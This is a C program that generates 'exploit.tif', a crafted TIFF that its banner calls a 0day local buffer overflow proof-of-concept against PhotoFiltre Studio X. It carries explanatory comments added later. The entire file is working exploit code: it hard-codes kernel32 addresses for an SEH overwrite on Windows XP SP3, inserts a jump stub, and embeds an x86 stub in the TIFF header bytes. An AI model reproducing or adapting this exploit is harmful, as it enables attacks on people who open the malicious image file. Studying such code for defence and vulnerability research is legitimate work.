#include <stdio.h>
#include <stdlib.h>
#include <string.h>
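#define fisier FILE
/* Allocate an array of n objects of type tip. n is parenthesised so an
 * expression argument (ALOC(i8, a + b)) multiplies as a whole; the old form
 * expanded to sizeof(tip)*a + b. The caller checks for NULL and free()s. */
#define ALOC(tip,n) ((tip*)malloc(sizeof(tip)*(n)))
#define VER "10.3.0"   /* presumably the targeted PhotoFiltre Studio X build; not used anywhere */
#define POCNAME "[*]PhotoFiltre Studio X .tif file local buffer overflow poc(0day)"
#define AUTHOR "[*]fl0 fl0w"
typedef char i8;
typedef short i16;
typedef int i32;
void gen_random(i8*,const int);
void print(i8*);
i32 mcpy(void*,const void*,i32);
void fwi32(fisier*,i32);
i32 filerr(fisier*);
void error(void);
void filebuild();
void readf(void);
unsigned int getFsize(fisier*,i8*);   /* declared only: never defined or called */
/* Layout numbers of the generated file, as hard-coded in filebuild():
 *   [0] 257  size of tif1 (TIFF header + IFD)   [1] 163  size of tif2
 *   [2] 217  offset of the pop/pop/ret address  [3] 213  offset of the jmp ebp address
 *   [4] 940  length of the random filler        [5] 29   offset of the 4-byte jump stub
 * Nothing reads this table; it only documents what filebuild() does. */
i32 sizes[]={257,163,217,213,940,29};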
typedef struct {
/* Return/jump addresses for the SEH overwrite, taken from kernel32.dll on
 * MS Windows XP Pro SP3 (filebuild() assigns them). They are specific to
 * that build and will not hold on other Windows versions or patch levels.
 */
i32 popopret;/* pop esi / pop edi / ret gadget; filebuild() copies it to tif1+217 (the author's "seh" offset) */
i32 jmpbyte;/* 4-byte jump stub; filebuild() copies it to tif1+29 */
i32 jmpEBP;/* jmp ebp gadget; filebuild() copies it to tif1+213 (the author's "next seh" offset) */
}instr;
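/* Entry point: generate exploit.tif, print the banner, then block on
 * getchar() (presumably so a console opened by double-click stays visible).
 * Returns 0; the old version fell off the end without a return value. */
int main(void)
{
    filebuild();
    printf("%s\n%s\n", POCNAME, AUTHOR);
    print("file done");
    getchar();
    return 0;
}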
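/* Layout of the generated file. The offsets index into tif1 (257 bytes);
 * the largest patch ends at SEH_OFF + 4 = 221, inside the array. These are
 * the same numbers as the file-scope sizes[] table. */
enum {
    JMP_STUB_OFF = 29,   /* where the 4-byte jump stub goes                */
    NSEH_OFF     = 213,  /* where the jmp ebp address goes ("next seh")    */
    SEH_OFF      = 217,  /* where the pop/pop/ret address goes ("seh")     */
    JUNK_LEN     = 940   /* alphanumeric filler between tif1 and tif2      */
};

/* kernel32.dll addresses from MS Windows XP Pro SP3 (author's notes). They
 * are specific to that build and must be re-found for any other target. */
static const unsigned long POPPOPRET_ADDR = 0x7C86CFC2UL; /* pop esi / pop edi / ret */
static const unsigned long JMP_EBP_ADDR   = 0x7C81ACD3UL; /* jmp ebp */
/* Author's note on this value: "jmp over (u need to cause a exception NOT a
 * exit call, so work on the instr)". Stored little-endian, so the file gets
 * the bytes 00 03 40 EB at JMP_STUB_OFF. */
static const unsigned long JMP_STUB       = 0xEB400300UL;

/* Store v at dst as four little-endian bytes regardless of host byte order.
 * The original memcpy'd a native int, which only matched on x86. */
static void put_le32(unsigned char *dst, unsigned long v)
{
    dst[0] = (unsigned char)(v & 0xffUL);
    dst[1] = (unsigned char)((v >> 8) & 0xffUL);
    dst[2] = (unsigned char)((v >> 16) & 0xffUL);
    dst[3] = (unsigned char)((v >> 24) & 0xffUL);
}

/* fwrite() n bytes from p to out; returns 1 on success, 0 on a short write. */
static int write_all(FILE *out, const void *p, size_t n)
{
    return fwrite(p, 1, n, out) == n;
}

/*
 * Write exploit.tif into the current directory:
 *   tif1  257 bytes   TIFF header + IFD with the three control values patched in
 *   junk  940 bytes   [0-9A-Za-z] filler from gen_random()
 *   tif2  163 bytes   trailing data
 *
 * The author's plan, kept from the original notes: overwrite the SEH handler
 * with a pop/pop/ret, overwrite the next-SEH pointer with jmp ebp, and patch
 * a short jump at the spot ebp points to; there is no room in the file for a
 * shellcode or an egghunter. The result is a crash PoC for the named viewer
 * on XP SP3 only -- open it on an isolated test VM, nowhere else.
 *
 * Changes from the original: the unused fopen("exploit.in") (a leaked handle)
 * is gone; the instr values are constants instead of a never-freed heap copy
 * sized sizeof(instr)*sizeof(instr); the filler buffer is 941 bytes instead of
 * 100001 on the stack and is zeroed, so no uninitialised stack byte reaches
 * the output; free() is no longer called on a stack array; every write and
 * the fclose() are checked. Errors are reported through error().
 */
void filebuild(void)
{
    unsigned char tif1[] = {
        0x49, 0x49, 0x2A, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x00, 0xFE, 0x00, 0x04, 0x00, 0x01, 0x00,
        0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFD, 0x01,
        0x00, 0x00, 0x01, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xB6, 0x01, 0x00, 0x00, 0x02, 0x01,
        0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x03, 0x01, 0x03, 0x00, 0x83, 0x00,
        0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x06, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00,
        0x00, 0x00, 0x0A, 0x01, 0xB6, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x11, 0x01,
        0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0x22, 0x01, 0x00, 0x00, 0x12, 0x01, 0x03, 0x00, 0x01, 0x00,
        0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x15, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00,
        0x00, 0x00, 0x16, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x01,
        0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0xFE, 0x01, 0x00, 0x00, 0x1A, 0x01, 0x05, 0x00, 0x01, 0x00,
        0x00, 0x00, 0xDA, 0x02, 0x00, 0x00, 0x1B, 0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0xE2, 0x02,
        0x00, 0x00, 0x1C, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x01,
        0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x29, 0x01, 0x03, 0x00, 0x02, 0x00,
        /* from 0x55 0x89 0xE5 onward this appears to be a small x86 stub
         * (push ebp / mov ebp,esp / sub esp,0x18 / ... / call eax / leave /
         * ret); the author does not document it, so treat that reading as
         * unconfirmed */
        0x00, 0x00, 0x00, 0x00, 0x01, 0x43, 0x43, 0xEB, 0x05, 0x8C, 0x08, 0xFC, 0x7F, 0x43, 0x55, 0x89,
        0xE5, 0x83, 0xEC, 0x18, 0xC7, 0x45, 0xFC, 0x77, 0x7A, 0x83, 0x7C, 0xC7, 0x44, 0x24, 0x04, 0xD0,
        0x03, 0x00, 0x00, 0xC7, 0x04, 0x24, 0x01, 0x0E, 0x00, 0x00, 0x8B, 0x45, 0xFC, 0xFF, 0xD0, 0xC9, 0xC3,
    };
    const unsigned char tif2[] = {
        0x92, 0x00, 0x92, 0x00, 0x96, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x00, 0x00,
        0x92, 0x00, 0x49, 0x00, 0x12, 0x00, 0x92, 0x00, 0xAF, 0x00, 0x92, 0x00, 0x49, 0x00, 0x49, 0x00,
        0x49, 0x00, 0x58, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x58, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
        0x57, 0x00, 0x12, 0x00, 0x5A, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x12, 0x00,
        0x00, 0x00, 0x46, 0x00, 0xFD, 0x00, 0xD5, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xEF, 0x00, 0xA9, 0x00,
        0xD9, 0x00, 0x00, 0x00, 0x70, 0x00, 0x6C, 0x00, 0xFA, 0x00, 0x99, 0x00, 0xC5, 0x00, 0xF7, 0x00,
        0xB4, 0x00, 0x48, 0x00, 0xAB, 0x00, 0xE9, 0x00, 0xDE, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xD7, 0x00,
        0x64, 0x00, 0xA9, 0x00, 0xD9, 0x00, 0x6E, 0x00, 0x68, 0x00, 0x70, 0x00, 0x92, 0x00, 0xCC, 0x00,
        0xF2, 0x00, 0x99, 0x00, 0x94, 0x00, 0xE9, 0x00, 0xAD, 0x00, 0xB4, 0x00, 0x4B, 0x00, 0xC9, 0x00,
        0x85, 0x00, 0xE9, 0x00, 0xE5, 0x00, 0xB4, 0x00, 0x80, 0x00, 0x98, 0x00, 0x8C, 0x00, 0xE0, 0x00,
        0xC4, 0x00, 0x33,
    };
    /* +1 because gen_random() NUL-terminates at junk[JUNK_LEN]. */
    char junk[JUNK_LEN + 1] = {0};
    FILE *out;
    int ok;

    /* Patch the control values into the IFD area; put_le32() writes exactly
     * the byte order the original x86 memcpy() produced. */
    put_le32(tif1 + SEH_OFF, POPPOPRET_ADDR);
    put_le32(tif1 + NSEH_OFF, JMP_EBP_ADDR);
    put_le32(tif1 + JMP_STUB_OFF, JMP_STUB);

    /* "wb": the payload is binary and must not get CRLF translation on Windows. */
    out = fopen("exploit.tif", "wb");
    if (out == NULL) {
        error();
        return;
    }

    /* gen_random() uses rand() without seeding, so the filler is identical
     * on every run; that is fine for padding. */
    gen_random(junk, JUNK_LEN);

    ok = write_all(out, tif1, sizeof tif1)
      && write_all(out, junk, JUNK_LEN)
      && write_all(out, tif2, sizeof tif2);
    /* fclose() flushes the stdio buffer; a failure here is a lost write. */
    if (fclose(out) != 0)
        ok = 0;
    if (!ok)
        error();
}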
/* Report the current errno to stderr, prefixed with "\nError:" (perror()). */
void error(void)
{
    static const char prefix[] = "\nError:";
    perror(prefix);
}
/* Return the error indicator of stream F, exactly as ferror() reports it
 * (0 when no error is flagged). F must be an open stream. */
int filerr(FILE *F)
{
    int flagged = ferror(F);
    return flagged;
}
/* Placeholder for reading an input file; currently a no-op with no callers. */
void readf(void)
{
    /* intentionally empty */
}
/* Write the 32-bit value adr to F as four bytes, least significant first
 * (little-endian), one fputc() per byte. fputc() results are not checked;
 * use ferror()/filerr() afterwards if that matters. */
void fwi32(FILE *F, int adr)
{
    int shift;
    for (shift = 0; shift < 32; shift += 8)
        fputc((adr >> shift) & 0xff, F);
}
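/* Copy len bytes from source to dest (the regions must not overlap) and
 * return the number of bytes copied. Returns 0 and leaves dest untouched
 * when either pointer is NULL or len is not positive.
 *
 * The previous version overwrote len with sizeof(source) -- the size of a
 * pointer -- so it always copied 4 or 8 bytes regardless of what the caller
 * asked for, overrunning any smaller dest. */
int mcpy(void *dest, const void *source, int len)
{
    if (dest == NULL || source == NULL || len <= 0)
        return 0;
    memcpy(dest, source, (size_t)len);
    return len;
}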
/* Print msg to stdout as one "[*]"-tagged line. msg must be a valid C string. */
void print(char *msg)
{
    fputs("[*]", stdout);
    puts(msg);
}
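/* Fill s[0..len-1] with pseudo-random characters from [0-9A-Za-z] and write
 * a NUL at s[len]; the caller must provide len + 1 bytes. Does nothing for a
 * NULL buffer or a negative len. Draws from rand() without seeding, so the
 * output repeats on every run unless the caller seeds, and rand() % 62 is
 * slightly biased -- fine for padding, unsuitable for anything secret.
 *
 * The previous loop started at index 1 and left s[0] uninitialised. */
void gen_random(char *s, const int len)
{
    static const char alphanum[] =
        "0123456789ABCDEFGHIJKLMNOPQRST"
        "UVWXYZabcdefghijklmnopqrstuvwxyz";
    const int nchars = (int)(sizeof alphanum - 1);   /* exclude the NUL */
    int i;

    if (s == NULL || len < 0)
        return;
    for (i = 0; i < len; ++i)
        s[i] = alphanum[rand() % nchars];
    s[len] = '\0';
}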